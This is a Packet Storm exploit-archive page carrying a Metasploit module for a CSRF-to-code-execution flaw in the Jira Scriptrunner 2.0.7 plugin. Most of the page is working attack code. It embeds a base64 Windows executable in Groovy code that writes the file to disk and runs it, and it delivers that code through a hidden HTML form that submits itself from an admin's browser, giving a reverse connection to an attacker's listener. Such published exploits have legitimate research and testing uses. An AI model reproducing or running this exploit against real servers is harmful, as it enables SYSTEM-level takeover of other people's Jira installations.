what you don't know can hurt you

Jira Scriptrunner 2.0.7 CSRF / Code Execution

Jira Scriptrunner 2.0.7 CSRF / Code Execution
Posted Nov 13, 2012
Authored by Ben Sheppard

This is a metasploit exploit for Jira Scriptrunner version 2.0.7. This Jira plugin does not use the built in Jira protections (websudo or CSRF tokens) to protect the page from CSRF. This page is supposed to be used by admins to automate tasks, it will accept java code and by default in a windows environment Jira will be run as system.

tags | exploit, java, csrf
systems | windows
MD5 | d93b2fae6f272dbcf03d8f64cadc1878

Jira Scriptrunner 2.0.7 CSRF / Code Execution

Change Mirror Download
#[Author] Ben 'highjack' Sheppard
#[Title] Jira Scriptrunner 2.0.7 <= CSRF/RCE
#[Twitter] @highjack_
#[Author Url] http://bensheppard.net/jira-scriptrunner-2-0-7/
#[Vendor Url] https://marketplace.atlassian.com/plugins/com.onresolve.jira.groovy.groovyrunner
#[Install] To use this copy it into ~/.msf4/modules/exploits/windows/http/scriptrunner.rb


require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE

def initialize
super(
'Name' => 'Jira Scriptrunner 2.0.7 <= CSRF/RCE',
'Description' => %q{This jira plugin does notuse the built in jira protections (websudo or csrf tokens)
to protect the page from CSRF. This page is supposed to be used by admins to automate tasks,
it will accept java code and by default in a windows environment jira will
be run as system},
'Author' => [ 'Ben \'highjack\' Sheppard'],
'License' => MSF_LICENSE,
'Version' => 'Revision: 1 ',
'Platform' => [ 'win'],
'Targets' =>
[
['Windows', { 'Arch' => ARCH_X86, 'Platform' => 'win' }]
],
'DefaultTarget' => 0
)

register_options(
[
OptString.new('RHOST', [true, 'Remote host of jira box']),
OptPort.new('RPORT', [true, 'Remote port of jira box', 8080]),
OptString.new('LHOST', [true, 'Multihandler host to listen on']),
OptBool.new('IS_SSL', [true, 'Does the target use ssl?', false]),
OptPort.new('LPORT', [true, 'Multihandler port to listen on',4444])
], self.class)

end

def csrf(url)
shell = Rex::Text.rand_text_alpha(rand(8)+3) + ".exe"
opts = {:arch => target.arch, :platform => target.platform}
encodedPayload = Rex::Text.encode_base64(generate_payload_exe(opts))

payloadLength = encodedPayload.length
chunkLength = 500

stringBuffer = ""
for i in (0..payloadLength / chunkLength)
if payloadLength < i+chunkLength
position = payloadLength-i
else
position = chunkLength
end
stringBuffer = stringBuffer + "encodedPayload.append(\"" + encodedPayload[i*chunkLength,position] + "\");\n"
end

jiraPayload = %Q|
import sun.misc.BASE64Decoder;
import java.io.*;
Runtime rt = Runtime.getRuntime();
try
{

StringBuffer encodedPayload = new StringBuffer();
#{stringBuffer}
String sEncodedPayload = new String(encodedPayload.toString());
BASE64Decoder b64decoder = new BASE64Decoder();
byte[] decodedPayload = b64decoder.decodeBuffer(sEncodedPayload);

BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream("#{shell}"));
output.write(decodedPayload);
output.close();
}
catch (Exception e)
{
return(e);
}
try
{
|
jiraPayload = jiraPayload + "rt.exec(\"#{shell}\");}catch (Exception e){return (e);}"
html = %Q|
<html>
<head></head>
<body>
<form action='#{url}/secure/admin/groovy/GroovyRunner.jspa' method='POST' id='groovy'>
<input type='hidden' name='scriptLanguage' value='Groovy' />
<div style='display:none'>
<textarea name='script'>#{jiraPayload}</textarea>
</div>
<input type='hidden' name='Run&32;now' value='Run&32;now' />
</form>
<script>document.getElementById('groovy').submit();</script>
</body>
</html>
|
return html
end

def getUrl()
rhost = datastore['RHOST']
rport = datastore['RPORT']
isSsl = datastore['IS_SSL']

if isSsl == true
url = 'https://'
else
url = 'http://'
end
url = url + rhost + ':' + rport
return url
end
def on_request_uri(cli, request)
url = getUrl()
print_status("\n#{self.name} handling response\n")
send_response_html( cli, csrf(url), { 'Content-Type' => 'text/html' } )
return
end

end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close